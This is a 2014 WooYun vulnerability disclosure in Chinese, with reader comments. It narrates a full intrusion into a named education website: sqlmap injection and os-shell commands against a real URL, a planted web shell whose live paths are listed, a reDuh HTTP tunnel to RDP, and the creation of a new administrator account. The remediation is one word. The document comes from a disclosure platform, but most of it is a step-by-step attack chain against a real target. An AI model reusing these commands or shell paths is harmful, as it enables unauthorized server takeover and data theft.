当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077566

漏洞标题:看我如何SQL注入沦陷一个网站绕过端口限制RDP隧道进服务器

相关厂商:shy.hpe.sh.cn

漏洞作者: Anonymous.L

提交时间:2014-09-27 21:28

修复时间:2014-11-11 21:30

公开时间:2014-11-11 21:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-27: 细节已通知厂商并且等待厂商处理中
2014-09-29: 厂商已经确认,细节仅向厂商公开
2014-10-09: 细节向核心白帽子及相关领域专家公开
2014-10-19: 细节向普通白帽子公开
2014-10-29: 细节向实习白帽子公开
2014-11-11: 细节向公众公开

简要描述:

仅仅一个SQL注入导致服务器沦陷,下面让我来叙述一下是如何渗透进去的。

详细说明:

网址:http://shy.hpe.sh.cn
一个sql注入导致的服务器沦陷。
一个事业教育单位,今天就上服务器看看.(声明:未有任何破坏性操作)
没事溜达到这个网址:(注入点)
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169
首先是暴库(16个数据库吧):
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --dbs

dbs.png


DBA权限:

dba.png


管理员:

man.png


脱裤暴表就没弄了,要这些数据也没啥用。选择了利用这个渗透进服务器。
下面说重点了。os-shell
sqlmap -u "http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/GetArticleList.aspx?parentid=169" --os-shell

os-shell.png


比较奇怪sqlmap里执行os-shell不顺手,有点问题,现在就是写个马进去就行了。
果断换了种方式写了个一句话:

pango.png


之前报错信息已经暴漏了网站的物理地址,马的物理位置:
d:\mainweb\ParentSchool\CN\jxhd\import.aspx
直接上服务器:

getinfo.png


至此,已经拥有了这台服务器的shell了。
上了个文件getinfo.aspx,这个getinfo.aspx是我等下要用到的。
到这里就在想能否RDP进服务器看看。菜刀里看的着实不舒服。
得到的公网IP信息:
Nmap scan report for 210.22.116.91
Host is up (0.011s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
就开了个80端口。
在菜刀里ipconfig下看到的是:
以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::852a:c63b:2d0a:b032%10
IPv4 地址 . . . . . . . . . . . . : 10.11.124.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.11.124.1
原来是这样的:
公网ip地址:210.22.116.91 这个只开了80端口
内网ip地址:10.11.124.5
要么是防火墙,要么做了端口映射,直接访问内网ip地址:10.11.124.5肯定是不行的了。怎么办?
上面的上传的那个getinfo.aspx文件的作用来了。
这里reDuh隧道穿透了:
java -jar reDuhClient.jar http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx
给大家弄个截图,大致会出现下面界面:

1.png


打开本地1010端口,使用telnet或者nc连接本地的1010端口:

2.png


创建隧道:[createTunnel]1234:127.0.0.1:3389
nc本地1010端口,将本地1234端口与远程的服务器端3389端口绑定

3.png


ok,基本工作均已完成。下面在用菜刀添加个用户:

demo.png


密码就不显示了。
提升权限至administrators组
好了,这就全部完成了:
mstsc打开本地127.0.0.1:1234端口,输入刚添加的用户名密码。直接RDP进内网吧:

rdp.png


这样就想操作你自己的电脑一样了,想干什么就干什么。

漏洞证明:

如上。
一句话:
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/import.aspx
RDP隧道:
http://shy.hpe.sh.cn/ParentSchool/CN/jxhd/getinfo.aspx

修复方案:

过滤

版权声明:转载请注明来源 Anonymous.L@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-09-29 13:51

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-28 10:24 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    ~给你弄一个禁止链接外网你就逗B了

  2. 2014-09-28 10:28 | D_in ( 普通白帽子 | Rank:413 漏洞数:62 | 到我嘴里来)

    标题好高大上

  3. 2014-09-28 10:41 | ( 路人 | Rank:10 漏洞数:1 | 关注网络安全,学习网络技术)

    洞主的账号 很有吸引!!

  4. 2014-09-28 11:45 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @大白菜 你还是没明白?我走的是隧道!除非网站不发布在公网上!

  5. 2014-09-28 11:46 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @白 ???怎么说?

  6. 2014-09-29 07:48 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    @Anonymous.L ...我的意思就是不在公网- -!现在挺流行这么做的

  7. 2014-09-29 09:42 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @大白菜 本来就不在公网,访问的网站ip是做了映射,不知道你说的流行是什么

  8. 2014-09-29 19:06 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    @Anonymous.L 那你扯啥犊子呢,映射不还是在外网

  9. 2014-09-29 20:27 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @大白菜 你说了好大一堆废话。按你的意思,那跟不发布网站有什么区别?说了是隧道,外边访问里面只有通过某个ip的80端口到内网服务器的真正应用上。你还是先理清楚吧!

  10. 2014-09-30 00:07 | 大白菜 ( 实习白帽子 | Rank:52 漏洞数:19 )

    @Anonymous.L ...说的真高深,,,一个端口转发说的跟啥似的

  11. 2014-09-30 01:09 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @大白菜 不明白你在端口转发什么,传统的反弹?端口复用?还是什么

  12. 2014-10-20 10:19 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    这个是基于HTTP隧道的,和一般的端口转发反弹什么的,不一样的啊。

  13. 2014-10-20 13:00 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @wefgod 是的,有了这个隧道防火墙就形同虚设。O(∩_∩)O~

  14. 2014-11-08 08:18 | 佩佩 ( 实习白帽子 | Rank:62 漏洞数:8 | 一个热衷于网络安全的白帽子,具有很强的逻...)

    @Anonymous.L. 有前途

  15. 2014-11-08 20:57 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @佩佩 我只是一个菜鸟而已,前途,好迷茫,不知道以后的路会是怎样

  16. 2014-11-09 14:24 | 佩佩 ( 实习白帽子 | Rank:62 漏洞数:8 | 一个热衷于网络安全的白帽子,具有很强的逻...)

    @Anonymous.L 你这么低调,你家里人知道吗?

  17. 2014-11-09 20:02 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @佩佩 ....其实hack只是兴趣爱好之一,我也很喜欢Code的,有招聘的没,刚入社会的小菜鸟,求拖走ing ╮(╯_╰)╭

  18. 2014-11-12 00:24 | GrayTrack ( 实习白帽子 | Rank:75 漏洞数:14 | 灰色轨迹)

    端口复用吧

  19. 2014-11-12 09:34 | 末日 ( 路人 | Rank:5 漏洞数:2 | 每天进步一点点)

    哈哈。。笑尿了。。这明明是特么的内网 还说的那么高大上。。还RDP隧道。。。唉。。大黑阔。。请低调点。。。

  20. 2014-11-12 13:31 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @末日 ip分几个段?210.22.116.91和10.11.124.5是同一网段?你把TCP/IP协议第一卷学好再来吧,真是逗了

  21. 2014-11-12 13:34 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @GrayTrack 准确的说应该算是HTTP隧道

  22. 2014-11-12 15:33 | 末日 ( 路人 | Rank:5 漏洞数:2 | 每天进步一点点)

    @Anonymous.L 你傻么 请上ip138.com查下10.11.124.5 谢谢

  23. 2014-11-12 17:06 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @末日 那又怎样了,关键是你telnet 210.22.116.91与10.11.124.5的80端口测试下不就知道了?我不是说了,不是防火墙就是端口映射了?要是你都能telnet上去,那你厉害

  24. 2014-11-12 17:38 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    问个问题得到的公网IP信息:这部分,nmap是在哪运行的?

  25. 2014-11-12 18:07 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @小饼仔 Windows DOS

  26. 2014-11-12 18:17 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    @Anonymous.L 你在本地运行nmap来获取web sever的ip?还有个问题创建隧道:[createTunnel]1234:127.0.0.1:3389中间的ip地址,我看了http://research.sensepost.com/tools/web/reduh上面说是用目标服务器的ip,你这怎么用127.0.0.1?

  27. 2014-11-12 18:20 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    @Anonymous.L 目标服务器指的是内网服务器

  28. 2014-11-12 18:20 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @小饼仔 HTTP隧道,这个127.0.0.1:3389 不是本地的3389

  29. 2014-11-12 18:23 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    @Anonymous.L 恩,3389指内网服务器的,但是这个ip地址为什么是127.0.0.1啊?

  30. 2014-11-12 18:29 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    @Anonymous.L web项目和数据库都在同一个服务器上,所以是127.0.0.1?

  31. 2014-11-12 19:47 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @小饼仔 跟WebApp和DB没啥联系,这些主要是基于getinfo那个文件执行的,本地1234---getinfo---3389,也就是HTTP与RDP之间的转换

  32. 2014-11-12 19:50 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    @Anonymous.L 私信求联系方式,私聊

  33. 2014-11-12 19:51 | loopx9 ( 核心白帽子 | Rank:602 漏洞数:62 | ..)

    @Anonymous.L 你这图搞错了吧? aspx应该是iis吧,添加用户怎么又跑到xampp去了。

  34. 2014-11-12 19:55 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @loopx9 你果然细心,是的,那是另一个站的,只不过乌云上没有发布。只是搞了个大致截图,够心细的!

  35. 2014-11-12 19:57 | 小饼仔 ( 普通白帽子 | Rank:363 漏洞数:48 | 不告诉你)

    @Anonymous.L 的确是由getinfo来执行的,但是你得告诉getinfo与那个ip的3389端口建立连接,127.0.0.1,也就是本机,即你提到的只有内网IP的服务器

  36. 2014-11-12 20:01 | Anonymous.L ( 实习白帽子 | Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)

    @小饼仔 3389端口就是传了getinfo那个文件的服务器3389,说白了就是他只开发了80端口,你没办法RDP连上去,所以你通过HTTP的80端口做了转换,变相打开了3389,其实还是80